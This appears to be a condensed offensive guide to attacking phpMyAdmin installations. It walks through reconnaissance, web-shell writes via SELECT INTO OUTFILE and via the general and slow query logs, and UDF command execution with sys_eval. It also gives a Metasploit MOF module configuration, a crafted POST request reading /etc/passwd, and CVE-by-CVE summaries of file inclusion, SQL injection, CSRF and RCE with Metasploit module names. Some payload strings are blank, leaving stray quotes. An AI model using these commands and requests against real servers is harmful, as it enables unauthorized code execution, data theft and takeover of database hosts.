Comprehensive phpMyAdmin Vulnerability Exploitation Guide

0x01 Information Gathering

1.1 Version Information

Appending common filenames such as readme.php , README , changelog.php , Documentation.html , etc., to the web root reveals the phpMyAdmin version if the administrator has not removed them.

readme.php
README
changelog.php
Change
Documentation.html
Documentation.txt
translators.html

Alternatively, the directory /doc/html/index.html can be accessed directly.

1.2 Absolute Path Discovery

Methods include:

Viewing the phpinfo() page, which often displays the web root.

Triggering web errors to leak absolute paths.

Inspecting configuration files of bundled stacks (e.g., phpStudy, LAMPP) for database paths.

Executing SHOW VARIABLES LIKE '%datadir%'; to obtain MySQL data directory.

Using SELECT LOAD_FILE('/etc/passwd'); or similar to read system files.

Testing write permissions with SELECT 'test' INTO OUTFILE '/var/www/$fuzz$/shell.php'; .

show variables like '%datadir%';

0x02 phpMyAdmin Exploitation

2.1 Writing Files to Obtain a Web Shell

Prerequisites:

Database user with root privileges.

Knowledge of the web server's absolute path.

Write permission for the database user on the target directory.

Direct file write using SELECT ... INTO OUTFILE requires the above conditions and that secure_file_priv is either empty or points to a writable directory.

SELECT "
" INTO OUTFILE "d:\phpstudy\www\7.php";

2.1.2 Writing via General Log

Enable the general log, locate its directory, set a custom log file inside the web root, and then inject PHP code as a log entry.

SET GLOBAL general_log = "ON";
SHOW VARIABLES LIKE 'general%';
SET GLOBAL general_log_file = "C:/phpStudy/PHPTutorial/WWW/404.php";
SELECT "
";

2.1.3 Writing via Slow Query Log

Similar to the general log, but using the slow‑query log.

SHOW VARIABLES LIKE '%slow%';
SET GLOBAL slow_query_log_file='C:/phpStudy/PHPTutorial/WWW/slow.php';
SET GLOBAL slow_query_log=ON;
SELECT '
' FROM mysql.db WHERE SLEEP(10);

2.2 User‑Defined Functions (UDF)

Applicable to both Windows and Linux. The attacker must have write access to the MySQL plugin directory ( lib/plugin ) or be able to place a shared library in a writable location. Example steps:

SHOW VARIABLES LIKE '%plugin%';
SELECT 'It is dll' INTO DUMPFILE 'C:\Program Files\MySQL\MySQL Server 5.1\lib\plugin\lib_mysqludf_sys.dll';
CREATE FUNCTION sys_eval RETURNS STRING SONAME "lib_mysqludf_sys.dll";
SELECT sys_eval('whoami');

2.3 MOF Privilege Escalation

On Windows ≤ 2003 where the C:\Windows\System32\mof directory is writable, an attacker can write a malicious MOF file via MySQL and achieve code execution every five seconds.

use exploit/windows/mysql/mysql_mof
set rhost 192.168.1.5
set rport 3306
set username root
set password root
exploit

0x03 Specific phpMyAdmin Vulnerabilities

3.1 WooYun‑2016‑199433 – Arbitrary File Read

Affected versions: phpMyAdmin 2.x.

POST /scripts/setup.php HTTP/1.1
Host: target:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

3.2 CVE‑2014‑8959 – Local File Inclusion

Affected versions: 4.0.1‑4.2.12 with PHP < 5.3.4.

/gis_data_editor.php?token=...&gis_data[gis_type]=/../../../../phpinfo.txt%00

3.3 CVE‑2016‑5734 – Remote Code Execution via Find/Replace

Exploits the tbl_find_replace.php endpoint after authenticating to phpMyAdmin. A Python script (shown in the source) automates token retrieval, table creation, and payload injection.

3.4 CVE‑2018‑12613 – Backend File Inclusion

Writes PHP code into a session file using SELECT ... and then includes the session file via a crafted URL.

3.5 CVE‑2018‑19968 – Arbitrary File Inclusion / RCE

Creates a database, stores PHP code in a table, generates a phpMyAdmin configuration entry, and finally includes the malicious session file.

3.6 CVE‑2020‑0554 – SQL Injection in server_privileges.php

By sending a crafted GET request with ajax_requests=true , validate_username=1 , and a malicious username parameter, an attacker can execute arbitrary SQL and extract data via error‑based injection.

3.7 CVE‑2019‑12922 – CSRF to Delete Servers

After logging in, an attacker adds a server entry, then crafts a malicious image request that triggers a server‑deletion request on behalf of the victim.

3.8 CVE‑2017‑1000499 – CSRF for Various Actions

Demonstrates CSRF payloads for password change, arbitrary file write, DNS data exfiltration, and mass row deletion using hidden <img> tags.

0x04 Special Versions – GetShell Techniques

4.1 CVE‑2013‑3238

Affected: 3.5.x < 3.5.8.1 and 4.0.0‑rc3. Exploited via Metasploit module exploit/multi/http/phpmyadminpregreplace .

4.2 CVE‑2012‑5159

Affected: phpMyAdmin 3.5.2.2. Exploited via Metasploit module exploit/multi/http/phpmyadmin3522_backdoor .

4.3 CVE‑2009‑1151 – Config File Command Execution

Affected: 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1. Exploited via exploit/unix/webapp/phpmyadmin_config .

4.4 Weak and Universal Passwords

Some early phpMyAdmin releases allow login as root without a password or accept a universal password for the user 'localhost'@'@' .

--- End of Summary ---